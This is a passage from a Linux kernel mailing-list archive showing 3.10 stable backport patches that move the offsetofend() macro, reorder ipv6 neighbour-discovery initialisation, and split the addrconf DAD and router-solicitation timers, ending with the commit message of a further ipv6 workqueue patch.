  To: linux-kernel, stable, linux; +Cc: Gavin Shan, Alex Williamson, Willy Tarreau

From: Gavin Shan <gwshan@linux.vnet.ibm.com>

commit b13460b92093b29347e99d6c3242e350052b62cd upstream.

The macro offsetofend() introduces unnecessary temporary variable
"tmp". The patch avoids that and saves a bit memory in stack.

Signed-off-by: Gavin Shan <gwshan@linux.vnet.ibm.com>
Signed-off-by: Alex Williamson <alex.williamson@redhat.com>
[wt: backported only for ipv6 out-of-bounds fix]

Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 include/linux/vfio.h | 5 ++---
 1 file changed, 2 insertions(+), 3 deletions(-)

diff --git a/include/linux/vfio.h b/include/linux/vfio.h
index ac8d488..1a7f0ac 100644
--- a/include/linux/vfio.h
+++ b/include/linux/vfio.h
@@ -86,8 +86,7 @@ extern void vfio_unregister_iommu_driver(
  * from user space.  This allows us to easily determine if the provided
  * structure is sized to include various fields.
  */
-#define offsetofend(TYPE, MEMBER) ({				\
-	TYPE tmp;						\
-	offsetof(TYPE, MEMBER) + sizeof(tmp.MEMBER); })		\
+#define offsetofend(TYPE, MEMBER) \
+	(offsetof(TYPE, MEMBER)	+ sizeof(((TYPE *)0)->MEMBER))
 
 #endif /* VFIO_H */
-- 
2.8.0.rc2.1.gbe9624a

^ permalink raw reply related	[flat|nested] 239+ messages in thread

* [PATCH 3.10 217/319] include/stddef.h: Move offsetofend() from vfio.h to a generic kernel header
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (115 preceding siblings ...)
  2017-02-05 19:20 ` [PATCH 3.10 216/319] drivers/vfio: Rework offsetofend() Willy Tarreau
@ 2017-02-05 19:20 ` Willy Tarreau
  2017-02-05 19:20 ` [PATCH 3.10 218/319] stddef.h: move offsetofend inside #ifndef/#endif guard, neaten Willy Tarreau
                   ` (101 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:20 UTC (permalink / raw)
  To: linux-kernel, stable, linux
  Cc: Denys Vlasenko, Alexei Starovoitov, Borislav Petkov,
	Frederic Weisbecker, H . Peter Anvin, Kees Cook, Oleg Nesterov,
	Steven Rostedt, Will Drewry, Ingo Molnar, Willy Tarreau

From: Denys Vlasenko <dvlasenk@redhat.com>

commit 3876488444e71238e287459c39d7692b6f718c3e upstream.

Suggested by Andy.

Suggested-by: Andy Lutomirski <luto@amacapital.net>
Signed-off-by: Denys Vlasenko <dvlasenk@redhat.com>
Acked-by: Linus Torvalds <torvalds@linux-foundation.org>
Cc: Alexei Starovoitov <ast@plumgrid.com>
Cc: Borislav Petkov <bp@alien8.de>
Cc: Frederic Weisbecker <fweisbec@gmail.com>
Cc: H. Peter Anvin <hpa@zytor.com>
Cc: Kees Cook <keescook@chromium.org>
Cc: Oleg Nesterov <oleg@redhat.com>
Cc: Steven Rostedt <rostedt@goodmis.org>
Cc: Will Drewry <wad@chromium.org>
Link: http://lkml.kernel.org/r/1425912738-559-1-git-send-email-dvlasenk@redhat.com
Signed-off-by: Ingo Molnar <mingo@kernel.org>
[wt: backported only for ipv6 out-of-bounds fix]

Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 include/linux/stddef.h |  9 +++++++++
 include/linux/vfio.h   | 13 -------------
 2 files changed, 9 insertions(+), 13 deletions(-)

diff --git a/include/linux/stddef.h b/include/linux/stddef.h
index f4aec0e..076af43 100644
--- a/include/linux/stddef.h
+++ b/include/linux/stddef.h
@@ -19,3 +19,12 @@ enum {
 #define offsetof(TYPE, MEMBER) ((size_t) &((TYPE *)0)->MEMBER)
 #endif
 #endif
+
+/**
+ * offsetofend(TYPE, MEMBER)
+ *
+ * @TYPE: The type of the structure
+ * @MEMBER: The member within the structure to get the end offset of
+ */
+#define offsetofend(TYPE, MEMBER) \
+	(offsetof(TYPE, MEMBER)	+ sizeof(((TYPE *)0)->MEMBER))
diff --git a/include/linux/vfio.h b/include/linux/vfio.h
index 1a7f0ac..ef4f737 100644
--- a/include/linux/vfio.h
+++ b/include/linux/vfio.h
@@ -76,17 +76,4 @@ extern int vfio_register_iommu_driver(const struct vfio_iommu_driver_ops *ops);
 extern void vfio_unregister_iommu_driver(
 				const struct vfio_iommu_driver_ops *ops);
 
-/**
- * offsetofend(TYPE, MEMBER)
- *
- * @TYPE: The type of the structure
- * @MEMBER: The member within the structure to get the end offset of
- *
- * Simple helper macro for dealing with variable sized structures passed
- * from user space.  This allows us to easily determine if the provided
- * structure is sized to include various fields.
- */
-#define offsetofend(TYPE, MEMBER) \
-	(offsetof(TYPE, MEMBER)	+ sizeof(((TYPE *)0)->MEMBER))
-
 #endif /* VFIO_H */
-- 
2.8.0.rc2.1.gbe9624a

^ permalink raw reply related	[flat|nested] 239+ messages in thread

* [PATCH 3.10 218/319] stddef.h: move offsetofend inside #ifndef/#endif guard, neaten
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (116 preceding siblings ...)
  2017-02-05 19:20 ` [PATCH 3.10 217/319] include/stddef.h: Move offsetofend() from vfio.h to a generic kernel header Willy Tarreau
@ 2017-02-05 19:20 ` Willy Tarreau
  2017-02-05 19:20 ` [PATCH 3.10 219/319] ipv6: don't call fib6_run_gc() until routing is ready Willy Tarreau
                   ` (100 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:20 UTC (permalink / raw)
  To: linux-kernel, stable, linux
  Cc: Joe Perches, Denys Vlasenko, Andrew Morton, Linus Torvalds,
	Willy Tarreau

From: Joe Perches <joe@perches.com>

commit 8c7fbe5795a016259445a61e072eb0118aaf6a61 upstream.

Commit 3876488444e7 ("include/stddef.h: Move offsetofend() from vfio.h
to a generic kernel header") added offsetofend outside the normal
include #ifndef/#endif guard.  Move it inside.

Miscellanea:

o remove unnecessary blank line
o standardize offsetof macros whitespace style

Signed-off-by: Joe Perches <joe@perches.com>
Cc: Denys Vlasenko <dvlasenk@redhat.com>
Signed-off-by: Andrew Morton <akpm@linux-foundation.org>
Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org>
[wt: backported only for ipv6 out-of-bounds fix]

Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 include/linux/stddef.h | 8 ++++----
 1 file changed, 4 insertions(+), 4 deletions(-)

diff --git a/include/linux/stddef.h b/include/linux/stddef.h
index 076af43..9c61c7c 100644
--- a/include/linux/stddef.h
+++ b/include/linux/stddef.h
@@ -3,7 +3,6 @@
 
 #include <uapi/linux/stddef.h>
 
-
 #undef NULL
 #define NULL ((void *)0)
 
@@ -14,10 +13,9 @@ enum {
 
 #undef offsetof
 #ifdef __compiler_offsetof
-#define offsetof(TYPE,MEMBER) __compiler_offsetof(TYPE,MEMBER)
+#define offsetof(TYPE, MEMBER)	__compiler_offsetof(TYPE, MEMBER)
 #else
-#define offsetof(TYPE, MEMBER) ((size_t) &((TYPE *)0)->MEMBER)
-#endif
+#define offsetof(TYPE, MEMBER)	((size_t)&((TYPE *)0)->MEMBER)
 #endif
 
 /**
@@ -28,3 +26,5 @@ enum {
  */
 #define offsetofend(TYPE, MEMBER) \
 	(offsetof(TYPE, MEMBER)	+ sizeof(((TYPE *)0)->MEMBER))
+
+#endif
-- 
2.8.0.rc2.1.gbe9624a

^ permalink raw reply related	[flat|nested] 239+ messages in thread

* [PATCH 3.10 219/319] ipv6: don't call fib6_run_gc() until routing is ready
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (117 preceding siblings ...)
  2017-02-05 19:20 ` [PATCH 3.10 218/319] stddef.h: move offsetofend inside #ifndef/#endif guard, neaten Willy Tarreau
@ 2017-02-05 19:20 ` Willy Tarreau
  2017-02-05 19:20 ` [PATCH 3.10 220/319] ipv6: split duplicate address detection and router solicitation timer Willy Tarreau
                   ` (99 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:20 UTC (permalink / raw)
  To: linux-kernel, stable, linux
  Cc: Michal Kubeček, David S . Miller, Mike Manning, Willy Tarreau

From: Michal Kubeček <mkubecek@suse.cz>

commit 2c861cc65ef4604011a0082e4dcdba2819aa191a upstream.

When loading the ipv6 module, ndisc_init() is called before
ip6_route_init(). As the former registers a handler calling
fib6_run_gc(), this opens a window to run the garbage collector
before necessary data structures are initialized. If a network
device is initialized in this window, adding MAC address to it
triggers a NETDEV_CHANGEADDR event, leading to a crash in
fib6_clean_all().

Take the event handler registration out of ndisc_init() into a
separate function ndisc_late_init() and move it after
ip6_route_init().

Signed-off-by: Michal Kubecek <mkubecek@suse.cz>
Signed-off-by: David S. Miller <davem@davemloft.net>
Cc: <stable@vger.kernel.org> 
Signed-off-by: Mike Manning <mmanning@brocade.com>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 include/net/ndisc.h |  2 ++
 net/ipv6/af_inet6.c |  6 ++++++
 net/ipv6/ndisc.c    | 18 +++++++++++-------
 3 files changed, 19 insertions(+), 7 deletions(-)

diff --git a/include/net/ndisc.h b/include/net/ndisc.h
index 5043f8b..4b12d99 100644
--- a/include/net/ndisc.h
+++ b/include/net/ndisc.h
@@ -190,7 +190,9 @@ static inline struct neighbour *__ipv6_neigh_lookup(struct net_device *dev, cons
 }
 
 extern int			ndisc_init(void);
+extern int			ndisc_late_init(void);
 
+extern void			ndisc_late_cleanup(void);
 extern void			ndisc_cleanup(void);
 
 extern int			ndisc_rcv(struct sk_buff *skb);
diff --git a/net/ipv6/af_inet6.c b/net/ipv6/af_inet6.c
index a944f13..9443af7 100644
--- a/net/ipv6/af_inet6.c
+++ b/net/ipv6/af_inet6.c
@@ -900,6 +900,9 @@ static int __init inet6_init(void)
 	err = ip6_route_init();
 	if (err)
 		goto ip6_route_fail;
+	err = ndisc_late_init();
+	if (err)
+		goto ndisc_late_fail;
 	err = ip6_flowlabel_init();
 	if (err)
 		goto ip6_flowlabel_fail;
@@ -960,6 +963,8 @@ ipv6_exthdrs_fail:
 addrconf_fail:
 	ip6_flowlabel_cleanup();
 ip6_flowlabel_fail:
+	ndisc_late_cleanup();
+ndisc_late_fail:
 	ip6_route_cleanup();
 ip6_route_fail:
 #ifdef CONFIG_PROC_FS
@@ -1020,6 +1025,7 @@ static void __exit inet6_exit(void)
 	ipv6_exthdrs_exit();
 	addrconf_cleanup();
 	ip6_flowlabel_cleanup();
+	ndisc_late_cleanup();
 	ip6_route_cleanup();
 #ifdef CONFIG_PROC_FS
 
diff --git a/net/ipv6/ndisc.c b/net/ipv6/ndisc.c
index deedf7d..de10ccf 100644
--- a/net/ipv6/ndisc.c
+++ b/net/ipv6/ndisc.c
@@ -1716,24 +1716,28 @@ int __init ndisc_init(void)
 	if (err)
 		goto out_unregister_pernet;
 #endif
-	err = register_netdevice_notifier(&ndisc_netdev_notifier);
-	if (err)
-		goto out_unregister_sysctl;
 out:
 	return err;
 
-out_unregister_sysctl:
 #ifdef CONFIG_SYSCTL
-	neigh_sysctl_unregister(&nd_tbl.parms);
 out_unregister_pernet:
-#endif
 	unregister_pernet_subsys(&ndisc_net_ops);
 	goto out;
+#endif
 }
 
-void ndisc_cleanup(void)
+int __init ndisc_late_init(void)
+{
+	return register_netdevice_notifier(&ndisc_netdev_notifier);
+}
+
+void ndisc_late_cleanup(void)
 {
 	unregister_netdevice_notifier(&ndisc_netdev_notifier);
+}
+
+void ndisc_cleanup(void)
+{
 #ifdef CONFIG_SYSCTL
 	neigh_sysctl_unregister(&nd_tbl.parms);
 #endif
-- 
2.8.0.rc2.1.gbe9624a

^ permalink raw reply related	[flat|nested] 239+ messages in thread

* [PATCH 3.10 220/319] ipv6: split duplicate address detection and router solicitation timer
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (118 preceding siblings ...)
  2017-02-05 19:20 ` [PATCH 3.10 219/319] ipv6: don't call fib6_run_gc() until routing is ready Willy Tarreau
@ 2017-02-05 19:20 ` Willy Tarreau
  2017-02-05 19:20 ` [PATCH 3.10 221/319] ipv6: move DAD and addrconf_verify processing to workqueue Willy Tarreau
                   ` (98 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:20 UTC (permalink / raw)
  To: linux-kernel, stable, linux
  Cc: Hannes Frederic Sowa, Flavio Leitner, Hideaki YOSHIFUJI,
	David Stevens, David S . Miller, Mike Manning, Willy Tarreau

From: Hannes Frederic Sowa <hannes@stressinduktion.org>

commit b7b1bfce0bb68bd8f6e62a28295922785cc63781 upstream.

This patch splits the timers for duplicate address detection and router
solicitations apart. The router solicitations timer goes into inet6_dev
and the dad timer stays in inet6_ifaddr.

The reason behind this patch is to reduce the number of unneeded router
solicitations send out by the host if additional link-local addresses
are created. Currently we send out RS for every link-local address on
an interface.

If the RS timer fires we pick a source address with ipv6_get_lladdr. This
change could hurt people adding additional link-local addresses and
specifying these addresses in the radvd clients section because we
no longer guarantee that we use every ll address as source address in
router solicitations.

Cc: Flavio Leitner <fleitner@redhat.com>
Cc: Hideaki YOSHIFUJI <yoshfuji@linux-ipv6.org>
Cc: David Stevens <dlstevens@us.ibm.com>
Signed-off-by: Hannes Frederic Sowa <hannes@stressinduktion.org>
Reviewed-by: Flavio Leitner <fbl@redhat.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Cc: <stable@vger.kernel.org> 
[Mike Manning <mmanning@brocade.com>: resolved conflicts with 36bddb]
Signed-off-by: Mike Manning <mmanning@brocade.com>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 include/net/if_inet6.h |   8 ++-
 net/ipv6/addrconf.c    | 136 ++++++++++++++++++++++++++-----------------------
 2 files changed, 79 insertions(+), 65 deletions(-)

diff --git a/include/net/if_inet6.h b/include/net/if_inet6.h
index 100fb8c..3b558c6 100644
--- a/include/net/if_inet6.h
+++ b/include/net/if_inet6.h
@@ -50,7 +50,7 @@ struct inet6_ifaddr {
 
 	int			state;
 
-	__u8			probes;
+	__u8			dad_probes;
 	__u8			flags;
 
 	__u16			scope;
@@ -58,7 +58,7 @@ struct inet6_ifaddr {
 	unsigned long		cstamp;	/* created timestamp */
 	unsigned long		tstamp; /* updated timestamp */
 
-	struct timer_list	timer;
+	struct timer_list	dad_timer;
 
 	struct inet6_dev	*idev;
 	struct rt6_info		*rt;
@@ -195,6 +195,10 @@ struct inet6_dev {
 	struct inet6_dev	*next;
 	struct ipv6_devconf	cnf;
 	struct ipv6_devstat	stats;
+
+	struct timer_list	rs_timer;
+	__u8			rs_probes;
+
 	unsigned long		tstamp; /* ipv6InterfaceTable update timestamp */
 	struct rcu_head		rcu;
 };
diff --git a/net/ipv6/addrconf.c b/net/ipv6/addrconf.c
index d0912ac..4ff6a9c 100644
--- a/net/ipv6/addrconf.c
+++ b/net/ipv6/addrconf.c
@@ -253,37 +253,32 @@ static inline bool addrconf_qdisc_ok(const struct net_device *dev)
 	return !qdisc_tx_is_noop(dev);
 }
 
-static void addrconf_del_timer(struct inet6_ifaddr *ifp)
+static void addrconf_del_rs_timer(struct inet6_dev *idev)
 {
-	if (del_timer(&ifp->timer))
+	if (del_timer(&idev->rs_timer))
+		__in6_dev_put(idev);
+}
+
+static void addrconf_del_dad_timer(struct inet6_ifaddr *ifp)
+{
+	if (del_timer(&ifp->dad_timer))
 		__in6_ifa_put(ifp);
 }
 
-enum addrconf_timer_t {
-	AC_NONE,
-	AC_DAD,
-	AC_RS,
-};
+static void addrconf_mod_rs_timer(struct inet6_dev *idev,
+				  unsigned long when)
+{
+	if (!timer_pending(&idev->rs_timer))
+		in6_dev_hold(idev);
+	mod_timer(&idev->rs_timer, jiffies + when);
+}
 
-static void addrconf_mod_timer(struct inet6_ifaddr *ifp,
-			       enum addrconf_timer_t what,
-			       unsigned long when)
+static void addrconf_mod_dad_timer(struct inet6_ifaddr *ifp,
+				   unsigned long when)
 {
-	if (!del_timer(&ifp->timer))
+	if (!timer_pending(&ifp->dad_timer))
 		in6_ifa_hold(ifp);
-
-	switch (what) {
-	case AC_DAD:
-		ifp->timer.function = addrconf_dad_timer;
-		break;
-	case AC_RS:
-		ifp->timer.function = addrconf_rs_timer;
-		break;
-	default:
-		break;
-	}
-	ifp->timer.expires = jiffies + when;
-	add_timer(&ifp->timer);
+	mod_timer(&ifp->dad_timer, jiffies + when);
 }
 
 static int snmp6_alloc_dev(struct inet6_dev *idev)
@@ -326,6 +321,7 @@ void in6_dev_finish_destroy(struct inet6_dev *idev)
 
 	WARN_ON(!list_empty(&idev->addr_list));
 	WARN_ON(idev->mc_list != NULL);
+	WARN_ON(timer_pending(&idev->rs_timer));
 
 #ifdef NET_REFCNT_DEBUG
 	pr_debug("%s: %s\n", __func__, dev ? dev->name : "NIL");
@@ -357,7 +353,8 @@ static struct inet6_dev *ipv6_add_dev(struct net_device *dev)
 	rwlock_init(&ndev->lock);
 	ndev->dev = dev;
 	INIT_LIST_HEAD(&ndev->addr_list);
-
+	setup_timer(&ndev->rs_timer, addrconf_rs_timer,
+		    (unsigned long)ndev);
 	memcpy(&ndev->cnf, dev_net(dev)->ipv6.devconf_dflt, sizeof(ndev->cnf));
 	ndev->cnf.mtu6 = dev->mtu;
 	ndev->cnf.sysctl = NULL;
@@ -776,7 +773,7 @@ void inet6_ifa_finish_destroy(struct inet6_ifaddr *ifp)
 
 	in6_dev_put(ifp->idev);
 
-	if (del_timer(&ifp->timer))
+	if (del_timer(&ifp->dad_timer))
 		pr_notice("Timer is still running, when freeing ifa=%p\n", ifp);
 
 	if (ifp->state != INET6_IFADDR_STATE_DEAD) {
@@ -869,9 +866,9 @@ ipv6_add_addr(struct inet6_dev *idev, const struct in6_addr *addr, int pfxlen,
 
 	spin_lock_init(&ifa->lock);
 	spin_lock_init(&ifa->state_lock);
-	init_timer(&ifa->timer);
+	setup_timer(&ifa->dad_timer, addrconf_dad_timer,
+		    (unsigned long)ifa);
 	INIT_HLIST_NODE(&ifa->addr_lst);
-	ifa->timer.data = (unsigned long) ifa;
 	ifa->scope = scope;
 	ifa->prefix_len = pfxlen;
 	ifa->flags = flags | IFA_F_TENTATIVE;
@@ -994,7 +991,7 @@ static void ipv6_del_addr(struct inet6_ifaddr *ifp)
 	}
 	write_unlock_bh(&idev->lock);
 
-	addrconf_del_timer(ifp);
+	addrconf_del_dad_timer(ifp);
 
 	ipv6_ifa_notify(RTM_DELADDR, ifp);
 
@@ -1617,7 +1614,7 @@ static void addrconf_dad_stop(struct inet6_ifaddr *ifp, int dad_failed)
 {
 	if (ifp->flags&IFA_F_PERMANENT) {
 		spin_lock_bh(&ifp->lock);
-		addrconf_del_timer(ifp);
+		addrconf_del_dad_timer(ifp);
 		ifp->flags |= IFA_F_TENTATIVE;
 		if (dad_failed)
 			ifp->flags |= IFA_F_DADFAILED;
@@ -3085,7 +3082,7 @@ static int addrconf_ifdown(struct net_device *dev, int how)
 		hlist_for_each_entry_rcu(ifa, h, addr_lst) {
 			if (ifa->idev == idev) {
 				hlist_del_init_rcu(&ifa->addr_lst);
-				addrconf_del_timer(ifa);
+				addrconf_del_dad_timer(ifa);
 				goto restart;
 			}
 		}
@@ -3094,6 +3091,8 @@ static int addrconf_ifdown(struct net_device *dev, int how)
 
 	write_lock_bh(&idev->lock);
 
+	addrconf_del_rs_timer(idev);
+
 	/* Step 2: clear flags for stateless addrconf */
 	if (!how)
 		idev->if_flags &= ~(IF_RS_SENT|IF_RA_RCVD|IF_READY);
@@ -3123,7 +3122,7 @@ static int addrconf_ifdown(struct net_device *dev, int how)
 	while (!list_empty(&idev->addr_list)) {
 		ifa = list_first_entry(&idev->addr_list,
 				       struct inet6_ifaddr, if_list);
-		addrconf_del_timer(ifa);
+		addrconf_del_dad_timer(ifa);
 
 		list_del(&ifa->if_list);
 
@@ -3165,10 +3164,10 @@ static int addrconf_ifdown(struct net_device *dev, int how)
 
 static void addrconf_rs_timer(unsigned long data)
 {
-	struct inet6_ifaddr *ifp = (struct inet6_ifaddr *) data;
-	struct inet6_dev *idev = ifp->idev;
+	struct inet6_dev *idev = (struct inet6_dev *)data;
+	struct in6_addr lladdr;
 
-	read_lock(&idev->lock);
+	write_lock(&idev->lock);
 	if (idev->dead || !(idev->if_flags & IF_READY))
 		goto out;
 
@@ -3179,18 +3178,19 @@ static void addrconf_rs_timer(unsigned long data)
 	if (idev->if_flags & IF_RA_RCVD)
 		goto out;
 
-	spin_lock(&ifp->lock);
-	if (ifp->probes++ < idev->cnf.rtr_solicits) {
-		/* The wait after the last probe can be shorter */
-		addrconf_mod_timer(ifp, AC_RS,
-				   (ifp->probes == idev->cnf.rtr_solicits) ?
-				   idev->cnf.rtr_solicit_delay :
-				   idev->cnf.rtr_solicit_interval);
-		spin_unlock(&ifp->lock);
+	if (idev->rs_probes++ < idev->cnf.rtr_solicits) {
+		if (!__ipv6_get_lladdr(idev, &lladdr, IFA_F_TENTATIVE))
+			ndisc_send_rs(idev->dev, &lladdr,
+				      &in6addr_linklocal_allrouters);
+		else
+			goto out;
 
-		ndisc_send_rs(idev->dev, &ifp->addr, &in6addr_linklocal_allrouters);
+		/* The wait after the last probe can be shorter */
+		addrconf_mod_rs_timer(idev, (idev->rs_probes ==
+					     idev->cnf.rtr_solicits) ?
+				      idev->cnf.rtr_solicit_delay :
+				      idev->cnf.rtr_solicit_interval);
 	} else {
-		spin_unlock(&ifp->lock);
 		/*
 		 * Note: we do not support deprecated "all on-link"
 		 * assumption any longer.
@@ -3199,8 +3199,8 @@ static void addrconf_rs_timer(unsigned long data)
 	}
 
 out:
-	read_unlock(&idev->lock);
-	in6_ifa_put(ifp);
+	write_unlock(&idev->lock);
+	in6_dev_put(idev);
 }
 
 /*
@@ -3216,8 +3216,8 @@ static void addrconf_dad_kick(struct inet6_ifaddr *ifp)
 	else
 		rand_num = net_random() % (idev->cnf.rtr_solicit_delay ? : 1);
 
-	ifp->probes = idev->cnf.dad_transmits;
-	addrconf_mod_timer(ifp, AC_DAD, rand_num);
+	ifp->dad_probes = idev->cnf.dad_transmits;
+	addrconf_mod_dad_timer(ifp, rand_num);
 }
 
 static void addrconf_dad_start(struct inet6_ifaddr *ifp)
@@ -3278,40 +3278,40 @@ static void addrconf_dad_timer(unsigned long data)
 	struct inet6_dev *idev = ifp->idev;
 	struct in6_addr mcaddr;
 
-	if (!ifp->probes && addrconf_dad_end(ifp))
+	if (!ifp->dad_probes && addrconf_dad_end(ifp))
 		goto out;
 
-	read_lock(&idev->lock);
+	write_lock(&idev->lock);
 	if (idev->dead || !(idev->if_flags & IF_READY)) {
-		read_unlock(&idev->lock);
+		write_unlock(&idev->lock);
 		goto out;
 	}
 
 	spin_lock(&ifp->lock);
 	if (ifp->state == INET6_IFADDR_STATE_DEAD) {
 		spin_unlock(&ifp->lock);
-		read_unlock(&idev->lock);
+		write_unlock(&idev->lock);
 		goto out;
 	}
 
-	if (ifp->probes == 0) {
+	if (ifp->dad_probes == 0) {
 		/*
 		 * DAD was successful
 		 */
 
 		ifp->flags &= ~(IFA_F_TENTATIVE|IFA_F_OPTIMISTIC|IFA_F_DADFAILED);
 		spin_unlock(&ifp->lock);
-		read_unlock(&idev->lock);
+		write_unlock(&idev->lock);
 
 		addrconf_dad_completed(ifp);
 
 		goto out;
 	}
 
-	ifp->probes--;
-	addrconf_mod_timer(ifp, AC_DAD, ifp->idev->nd_parms->retrans_time);
+	ifp->dad_probes--;
+	addrconf_mod_dad_timer(ifp, ifp->idev->nd_parms->retrans_time);
 	spin_unlock(&ifp->lock);
-	read_unlock(&idev->lock);
+	write_unlock(&idev->lock);
 
 	/* send a neighbour solicitation for our addr */
 	addrconf_addr_solict_mult(&ifp->addr, &mcaddr);
@@ -3323,6 +3323,9 @@ out:
 static void addrconf_dad_completed(struct inet6_ifaddr *ifp)
 {
 	struct net_device *dev = ifp->idev->dev;
+	struct in6_addr lladdr;
+
+	addrconf_del_dad_timer(ifp);
 
 	/*
 	 *	Configure the address for reception. Now it is valid.
@@ -3343,13 +3346,20 @@ static void addrconf_dad_completed(struct inet6_ifaddr *ifp)
 		 *	[...] as part of DAD [...] there is no need
 		 *	to delay again before sending the first RS
 		 */
-		ndisc_send_rs(ifp->idev->dev, &ifp->addr, &in6addr_linklocal_allrouters);
+		if (!ipv6_get_lladdr(dev, &lladdr, IFA_F_TENTATIVE))
+			ndisc_send_rs(dev, &lladdr,
+				      &in6addr_linklocal_allrouters);
+		else
+			return;
 
-		spin_lock_bh(&ifp->lock);
-		ifp->probes = 1;
+		write_lock_bh(&ifp->idev->lock);
+		spin_lock(&ifp->lock);
+		ifp->idev->rs_probes = 1;
 		ifp->idev->if_flags |= IF_RS_SENT;
-		addrconf_mod_timer(ifp, AC_RS, ifp->idev->cnf.rtr_solicit_interval);
-		spin_unlock_bh(&ifp->lock);
+		addrconf_mod_rs_timer(ifp->idev,
+				      ifp->idev->cnf.rtr_solicit_interval);
+		spin_unlock(&ifp->lock);
+		write_unlock_bh(&ifp->idev->lock);
 	}
 }
 
-- 
2.8.0.rc2.1.gbe9624a

^ permalink raw reply related	[flat|nested] 239+ messages in thread

* [PATCH 3.10 221/319] ipv6: move DAD and addrconf_verify processing to workqueue
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (119 preceding siblings ...)
  2017-02-05 19:20 ` [PATCH 3.10 220/319] ipv6: split duplicate address detection and router solicitation timer Willy Tarreau
@ 2017-02-05 19:20 ` Willy Tarreau
  2017-02-05 19:20 ` [PATCH 3.10 222/319] ipv6: addrconf: fix dev refcont leak when DAD failed Willy Tarreau
                   ` (97 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:20 UTC (permalink / raw)
  To: linux-kernel, stable, linux
  Cc: Hannes Frederic Sowa, Stephen Hemminger, David S . Miller,
	Mike Manning, Willy Tarreau

From: Hannes Frederic Sowa <hannes@stressinduktion.org>

commit c15b1ccadb323ea50023e8f1cca2954129a62b51 upstream.

addrconf_join_solict and addrconf_join_anycast may cause actions which
need rtnl locked, especially on first address creation.

A new DAD state is introduced which defers processing of the initial
DAD processing into a workqueue.

To get rtnl lock we need to push the code paths which depend on those
calls up to workqueues, specifically addrconf_verify and the DAD
processing.

(v2)
addrconf_dad_failure needs to be queued up to the workqueue, too. This
patch introduces a new DAD state and stop the DAD processing in the
workqueue (this is because of the possible ipv6_del_addr processing
which removes the solicited multicast address from the device).

addrconf_verify_lock is removed, too. After the transition it is not
needed any more.

As we are not processing in bottom half anymore we need to be a bit more
careful about disabling bottom half out when we lock spin_locks which are also
used in bh.

Relevant backtrace:
[  541.030090] RTNL: assertion failed at net/core/dev.c (4496)
[  541.031143] CPU: 0 PID: 0 Comm: swapper/0 Tainted: G           O 3.10.33-1-amd64-vyatta #1
[  541.031145] Hardware name: Bochs Bochs, BIOS Bochs 01/01/2007
[  541.031146]  ffffffff8148a9f0 000000000000002f ffffffff813c98c1 ffff88007c4451f8
[  541.031148]  0000000000000000 0000000000000000 ffffffff813d3540 ffff88007fc03d18
[  541.031150]  0000880000000006 ffff88007c445000 ffffffffa0194160 0000000000000000
[  541.031152] Call Trace:
[  541.031153]  <IRQ>  [<ffffffff8148a9f0>] ? dump_stack+0xd/0x17
[  541.031180]  [<ffffffff813c98c1>] ? __dev_set_promiscuity+0x101/0x180
[  541.031183]  [<ffffffff813d3540>] ? __hw_addr_create_ex+0x60/0xc0
[  541.031185]  [<ffffffff813cfe1a>] ? __dev_set_rx_mode+0xaa/0xc0
[  541.031189]  [<ffffffff813d3a81>] ? __dev_mc_add+0x61/0x90
[  541.031198]  [<ffffffffa01dcf9c>] ? igmp6_group_added+0xfc/0x1a0 [ipv6]
[  541.031208]  [<ffffffff8111237b>] ? kmem_cache_alloc+0xcb/0xd0
[  541.031212]  [<ffffffffa01ddcd7>] ? ipv6_dev_mc_inc+0x267/0x300 [ipv6]
[  541.031216]  [<ffffffffa01c2fae>] ? addrconf_join_solict+0x2e/0x40 [ipv6]
[  541.031219]  [<ffffffffa01ba2e9>] ? ipv6_dev_ac_inc+0x159/0x1f0 [ipv6]
[  541.031223]  [<ffffffffa01c0772>] ? addrconf_join_anycast+0x92/0xa0 [ipv6]
[  541.031226]  [<ffffffffa01c311e>] ? __ipv6_ifa_notify+0x11e/0x1e0 [ipv6]
[  541.031229]  [<ffffffffa01c3213>] ? ipv6_ifa_notify+0x33/0x50 [ipv6]
[  541.031233]  [<ffffffffa01c36c8>] ? addrconf_dad_completed+0x28/0x100 [ipv6]
[  541.031241]  [<ffffffff81075c1d>] ? task_cputime+0x2d/0x50
[  541.031244]  [<ffffffffa01c38d6>] ? addrconf_dad_timer+0x136/0x150 [ipv6]
[  541.031247]  [<ffffffffa01c37a0>] ? addrconf_dad_completed+0x100/0x100 [ipv6]
[  541.031255]  [<ffffffff8105313a>] ? call_timer_fn.isra.22+0x2a/0x90
[  541.031258]  [<ffffffffa01c37a0>] ? addrconf_dad_completed+0x100/0x100 [ipv6]

Hunks and backtrace stolen from a patch by Stephen Hemminger.

Reported-by: Stephen Hemminger <stephen@networkplumber.org>
Signed-off-by: Stephen Hemminger <stephen@networkplumber.org>
Signed-off-by: Hannes Frederic Sowa <hannes@stressinduktion.org>
Signed-off-by: David S. Miller <davem@davemloft.net>
Cc: <stable@vger.kernel.org> 
Cc: <stable@vger.kernel.org> 
[Mike Manning <mmanning@brocade.com>: resolved minor conflicts in addrconf.c]
Signed-off-by: Mike Manning <mmanning@brocade.com>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
